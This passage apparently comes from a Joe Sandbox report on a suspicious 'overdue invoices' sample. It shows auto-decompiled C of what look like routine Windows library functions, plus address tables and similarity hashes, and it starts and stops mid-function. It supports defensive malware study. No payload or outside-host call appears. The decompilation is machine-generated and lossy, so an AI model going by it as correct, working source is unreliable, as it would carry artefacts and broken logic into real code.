				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E009B3690(1, _t117, 0x971810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E009DAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L009B4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E009DAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E00A1500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E009D9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                  0x00a151be
                  0x00a151c3
                  0x00a151c8
                  0x00a151cd
                  0x00a151d0
                  0x00a151d3
                  0x00a151d8
                  0x00a151db
                  0x00a151de
                  0x00a151e0
                  0x00a151e3
                  0x00a151e6
                  0x00a151e8
                  0x00a15342
                  0x00a15351
                  0x00a15356
                  0x00a1535a
                  0x00a15360
                  0x00a15363
                  0x00a15366
                  0x00a15369
                  0x00a15369
                  0x00a1536b
                  0x00a1536b
                  0x00a15370
                  0x00a153a3
                  0x00a153a4
                  0x00a153a6
                  0x00a153ab
                  0x00a153ab
                  0x00a153ae
                  0x00a153ae
                  0x00a153b5
                  0x00a153bf
                  0x00a153bf
                  0x00a15375
                  0x00a15396
                  0x00a153a0
                  0x00a153a0
                  0x00000000
                  0x00a15396
                  0x00a15377
                  0x00a15379
                  0x00a1537f
                  0x00a1538c
                  0x00a15390
                  0x00000000
                  0x00a15390
                  0x00a151ee
                  0x00a151f1
                  0x00a15301
                  0x00a15310
                  0x00a15315
                  0x00a15318
                  0x00a1531b
                  0x00a15320
                  0x00a1532e
                  0x00a15331
                  0x00000000
                  0x00a15331
                  0x00a15328
                  0x00a15329
                  0x00000000
                  0x00a15329
                  0x00a151fa
                  0x00a15235
                  0x00a15236
                  0x00a15239
                  0x00a1523f
                  0x00a15240
                  0x00a15241
                  0x00a15242
                  0x00a15246
                  0x00a15247
                  0x00a1524e
                  0x00a15251
                  0x00a15267
                  0x00a15269
                  0x00a1526e
                  0x00a1527d
                  0x00a1527e
                  0x00a15281
                  0x00a15282
                  0x00a15287
                  0x00a15288
                  0x00a1528a
                  0x00a1528f
                  0x00a15294
                  0x00000000
                  0x00000000
                  0x00a1529a
                  0x00a1529c
                  0x00a1529e
                  0x00a1529e
                  0x00a152a4
                  0x00a152b0
                  0x00000000
                  0x00000000
                  0x00a152ba
                  0x00a152bc
                  0x00a152bc
                  0x00a152d4
                  0x00a152d9
                  0x00a152dc
                  0x00a152e1
                  0x00000000
                  0x00000000
                  0x00a152e7
                  0x00a152f4
                  0x00000000
                  0x00a152f4
                  0x00a15270
                  0x00000000
                  0x00a15270
                  0x00a151fc
                  0x00a151fd
                  0x00a15202
                  0x00a15203
                  0x00a15205
                  0x00a1520a
                  0x00a1520f
                  0x00000000
                  0x00000000
                  0x00a1521b
                  0x00a15226
                  0x00a1522b
                  0x00a1521d
                  0x00a1521d
                  0x00a15222
                  0x00a15222
                  0x00a1522d
                  0x00000000

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: Legacy$UEFI
                  • API String ID: 2994545307-634100481
                  • Opcode ID: f19d364064f23dbb9454948ce904138f555bf203e65c0e7efdd6d5333a4009c0
                  • Instruction ID: 4ef2f4c77aae17c71c4e05c4310f475662d604727ac24d825933041d157961e8
                  • Opcode Fuzzy Hash: f19d364064f23dbb9454948ce904138f555bf203e65c0e7efdd6d5333a4009c0
                  • Instruction Fuzzy Hash: 44516CB2E00A18DFDB24DFA8C951BEDB7F8BF88740F14802DE559EB251D6719980CB10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009BB944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                  Download Yara Rule
                  C-Code - Quality: 76%
                  			E009BB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0xa8d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E009B7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E00A68CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = L009D9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return L009DB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E009DCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E009B7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							L00A68F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = L009DAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0xa88628; // 0x0
								_v68 = _t77;
								_t78 =  *0xa8862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0xa88628; // 0x0
							_t116 =  *0xa8862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                  0x009bb94c
                  0x009bb956
                  0x009bb95c
                  0x009bb95e
                  0x009bb964
                  0x009bb969
                  0x009bb96d
                  0x009bb96d
                  0x009bb970
                  0x009bb974
                  0x009bb97a
                  0x009bbadf
                  0x009bbadf
                  0x009bbae2
                  0x009bbae4
                  0x009bbae6
                  0x009bbaf0
                  0x00a02cb8
                  0x009bbaf6
                  0x009bbaf6
                  0x009bbaf6
                  0x009bbafd
                  0x009bbb1f
                  0x009bbb1f
                  0x009bbaff
                  0x009bbb00
                  0x009bbb00
                  0x009bbb03
                  0x009bbb03
                  0x009bbacb
                  0x009bbacf
                  0x009bbad0
                  0x009bbad1
                  0x009bbadc
                  0x009bbadc
                  0x009bb980
                  0x009bb980
                  0x009bb988
                  0x009bb98b
                  0x009bb98d
                  0x009bb990
                  0x009bb993
                  0x009bb999
                  0x009bb99b
                  0x009bb9a1
                  0x009bb9a5
                  0x009bb9aa
                  0x009bb9b0
                  0x009bb9bb
                  0x009bb9c0
                  0x009bb9c3
                  0x009bb9ca
                  0x009bb9cc
                  0x009bb9cf
                  0x009bb9d3
                  0x009bb9d7
                  0x009bba94
                  0x009bba94
                  0x009bba98
                  0x009bbaa3
                  0x00a02ccb
                  0x009bbaa9
                  0x009bbaa9
                  0x009bbaa9
                  0x009bbab1
                  0x00a02cd5
                  0x00a02cdd
                  0x00a02cdd
                  0x009bbabb
                  0x009bbabc
                  0x009bbac2
                  0x009bbac3
                  0x009bbac3
                  0x009bbac6
                  0x00000000
                  0x009bb9dd
                  0x009bb9dd
                  0x009bb9e7
                  0x009bb9e7
                  0x009bb9ec
                  0x009bb9ec
                  0x009bb9f1
                  0x009bb9f5
                  0x009bb9fa
                  0x009bba00
                  0x009bba0c
                  0x009bba10
                  0x009bba10
                  0x009bba12
                  0x009bba18
                  0x00000000
                  0x00000000
                  0x009bbb26
                  0x009bbb26
                  0x009bba1e
                  0x009bba1e
                  0x009bba23
                  0x009bba25
                  0x009bba2c
                  0x009bba30
                  0x009bba35
                  0x009bba35
                  0x009bba41
                  0x009bba46
                  0x009bba4c
                  0x009bba50
                  0x009bba54
                  0x009bba6a
                  0x009bba6e
                  0x009bba70
                  0x009bba74
                  0x009bba78
                  0x009bba7a
                  0x009bba7c
                  0x009bba8e
                  0x009bba90
                  0x009bba92
                  0x009bbb14
                  0x009bbb14
                  0x009bbb16
                  0x009bbb16
                  0x00000000
                  0x009bba7c
                  0x009bbb0a
                  0x009bbb0d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009bbb0f

                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009BB9A5
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID:
                  • API String ID: 885266447-0
                  • Opcode ID: 6cc22e96a7ecb3e18670e094b39a5287b5990f77a6ac6411676c450fbde95e2a
                  • Instruction ID: 9af5ab0adfddbcf0d3ced3d76589b117647f2d88560e7cf9203fab78a5c8b40e
                  • Opcode Fuzzy Hash: 6cc22e96a7ecb3e18670e094b39a5287b5990f77a6ac6411676c450fbde95e2a
                  • Instruction Fuzzy Hash: 54515D71A08300CFC720CF68C580A2ABBE9FB88724F64496EF58587395D7B0EC44CB92
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0099B171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 78%
                  			E0099B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0xa6f7a8);
				E009ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E009ED130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E009DD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E009DF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L009EDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E009DB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												L009DB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E009DE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E009DA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                  0x0099b171
                  0x0099b171
                  0x0099b171
                  0x0099b171
                  0x0099b171
                  0x0099b176
                  0x0099b17b
                  0x0099b180
                  0x0099b186
                  0x0099b18f
                  0x0099b198
                  0x0099b1a4
                  0x0099b1aa
                  0x009f4802
                  0x009f4802
                  0x009f4805
                  0x009f480c
                  0x009f480e
                  0x0099b1d1
                  0x0099b1d3
                  0x0099b1de
                  0x0099b1de
                  0x009f4817
                  0x009f481e
                  0x009f4820
                  0x009f4822
                  0x009f4822
                  0x009f4824
                  0x009f4824
                  0x009f482a
                  0x00000000
                  0x00000000
                  0x009f4835
                  0x009f483a
                  0x009f483d
                  0x009f483f
                  0x009f4842
                  0x009f4842
                  0x009f4842
                  0x009f4846
                  0x009f484c
                  0x009f484e
                  0x009f4851
                  0x009f4851
                  0x009f4853
                  0x009f4854
                  0x009f4854
                  0x009f4858
                  0x009f485a
                  0x009f485a
                  0x009f485d
                  0x009f485f
                  0x009f4861
                  0x009f4861
                  0x009f4866
                  0x009f486b
                  0x009f486e
                  0x009f4871
                  0x009f4876
                  0x009f4876
                  0x009f4878
                  0x009f487b
                  0x009f4884
                  0x009f4884
                  0x00000000
                  0x009f487d
                  0x009f487d
                  0x009f4882
                  0x009f4889
                  0x009f4889
                  0x009f488f
                  0x009f4891
                  0x009f48e0
                  0x009f48e2
                  0x009f48e4
                  0x009f48e4
                  0x009f48e7
                  0x009f48e7
                  0x009f48ed
                  0x009f48f4
                  0x009f48f6
                  0x009f4951
                  0x009f4951
                  0x009f4953
                  0x009f4953
                  0x009f4956
                  0x009f4956
                  0x009f4958
                  0x009f4959
                  0x009f4959
                  0x009f495d
                  0x009f495d
                  0x009f495f
                  0x009f495f
                  0x009f4965
                  0x009f4969
                  0x009f49ba
                  0x009f49ba
                  0x009f49c1
                  0x009f49c5
                  0x009f49cc
                  0x009f49d4
                  0x009f49d7
                  0x009f49da
                  0x009f49e4
                  0x009f49e5
                  0x009f49f3
                  0x009f4a02
                  0x00000000
                  0x009f4a02
                  0x009f4972
                  0x009f4974
                  0x00000000
                  0x00000000
                  0x009f4976
                  0x009f4979
                  0x009f4982
                  0x009f4983
                  0x009f4984
                  0x009f498b
                  0x009f498d
                  0x009f4991
                  0x009f4993
                  0x009f4999
                  0x009f499d
                  0x009f49a2
                  0x009f49a2
                  0x009f49a2
                  0x009f4999
                  0x009f49ac
                  0x00000000
                  0x009f49b3
                  0x009f48f8
                  0x009f48fe
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009f48fe
                  0x009f4895
                  0x009f489c
                  0x009f48ad
                  0x009f48b2
                  0x009f48b5
                  0x009f48b7
                  0x009f48ba
                  0x009f48bc
                  0x009f48c6
                  0x009f48c6
                  0x009f48cb
                  0x009f48d1
                  0x009f48d4
                  0x009f48d8
                  0x009f48d8
                  0x00000000
                  0x009f48d8
                  0x009f48be
                  0x009f48c0
                  0x00000000
                  0x00000000
                  0x009f48c2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009f48c4
                  0x00000000
                  0x009f4882
                  0x009f487b
                  0x009f4904
                  0x009f4906
                  0x00000000
                  0x00000000
                  0x009f4908
                  0x009f490e
                  0x00000000
                  0x00000000
                  0x009f4910
                  0x009f4917
                  0x009f4917
                  0x00000000
                  0x009f4917
                  0x0099b1ba
                  0x009f47f9
                  0x009f47fc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009f47fc
                  0x0099b1c0
                  0x0099b1c0
                  0x0099b1c3
                  0x0099b1cb
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID: _vswprintf_s
                  • String ID:
                  • API String ID: 677850445-0
                  • Opcode ID: 8241bd77c3c2675f93203134d4dd1702a93bd10d15cc36c2666c900f172c8374
                  • Instruction ID: 505e39b983303fb54878b9b361adf43e2f6030d3cc62d7c625937eaa79545392
                  • Opcode Fuzzy Hash: 8241bd77c3c2675f93203134d4dd1702a93bd10d15cc36c2666c900f172c8374
                  • Instruction Fuzzy Hash: 4351DF71E0025D8BDF31CF68C845BBFBBB4AF40710F2081ADEA59AB282D7744D818B91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009C2581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E009C2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t245;
				signed int _t249;
				void* _t250;
				signed int _t251;
				signed int _t258;
				signed int _t260;
				intOrPtr _t262;
				signed int _t265;
				signed int _t272;
				signed int _t275;
				signed int _t283;
				intOrPtr _t289;
				signed int _t291;
				signed int _t293;
				void* _t294;
				signed int _t295;
				signed int _t296;
				unsigned int _t299;
				signed int _t303;
				void* _t304;
				signed int _t305;
				signed int _t309;
				intOrPtr _t322;
				signed int _t331;
				signed int _t333;
				signed int _t334;
				signed int _t338;
				signed int _t339;
				signed int _t341;
				signed int _t343;
				signed int _t346;
				void* _t347;

				_t343 = _t346;
				_t347 = _t346 - 0x4c;
				_v8 =  *0xa8d360 ^ _t343;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t338 = 0xa8b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t299 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t289 = 0x48;
				_t319 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t331 = 0;
				_v37 = _t319;
				if(_v48 <= 0) {
					L16:
					_t45 = _t289 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t339 = 0xc0000106;
						goto L32;
					} else {
						_t338 = L009B4620(_t299,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t289);
						_v52 = _t338;
						__eflags = _t338;
						if(_t338 == 0) {
							_t339 = 0xc0000017;
							goto L32;
						} else {
							 *(_t338 + 0x44) =  *(_t338 + 0x44) & 0x00000000;
							_t50 = _t338 + 0x48; // 0x48
							_t333 = _t50;
							_t319 = _v32;
							 *((intOrPtr*)(_t338 + 0x3c)) = _t289;
							_t291 = 0;
							 *((short*)(_t338 + 0x30)) = _v48;
							__eflags = _t319;
							if(_t319 != 0) {
								 *(_t338 + 0x18) = _t333;
								__eflags = _t319 - 0xa88478;
								 *_t338 = ((0 | _t319 == 0x00a88478) - 0x00000001 & 0xfffffffb) + 7;
								E009DF3E0(_t333,  *((intOrPtr*)(_t319 + 4)),  *_t319 & 0x0000ffff);
								_t319 = _v32;
								_t347 = _t347 + 0xc;
								_t291 = 1;
								__eflags = _a8;
								_t333 = _t333 + (( *_t319 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t283 = E00A239F2(_t333);
									_t319 = _v32;
									_t333 = _t283;
								}
							}
							_t303 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t339 = _v68;
								__eflags = 0;
								 *((short*)(_t333 - 2)) = 0;
								goto L32;
							} else {
								_t293 = _t338 + _t291 * 4;
								_v56 = _t293;
								do {
									__eflags = _t319;
									if(_t319 != 0) {
										_t245 =  *(_v60 + _t303 * 4);
										__eflags = _t245;
										if(_t245 == 0) {
											goto L30;
										} else {
											__eflags = _t245 == 5;
											if(_t245 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t293 =  *(_v60 + _t303 * 4);
										 *(_t293 + 0x18) = _t333;
										_t249 =  *(_v60 + _t303 * 4);
										__eflags = _t249 - 8;
										if(_t249 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t249 * 4 +  &M009C2959))) {
												case 0:
													__ax =  *0xa88488;
													__eflags = __ax;
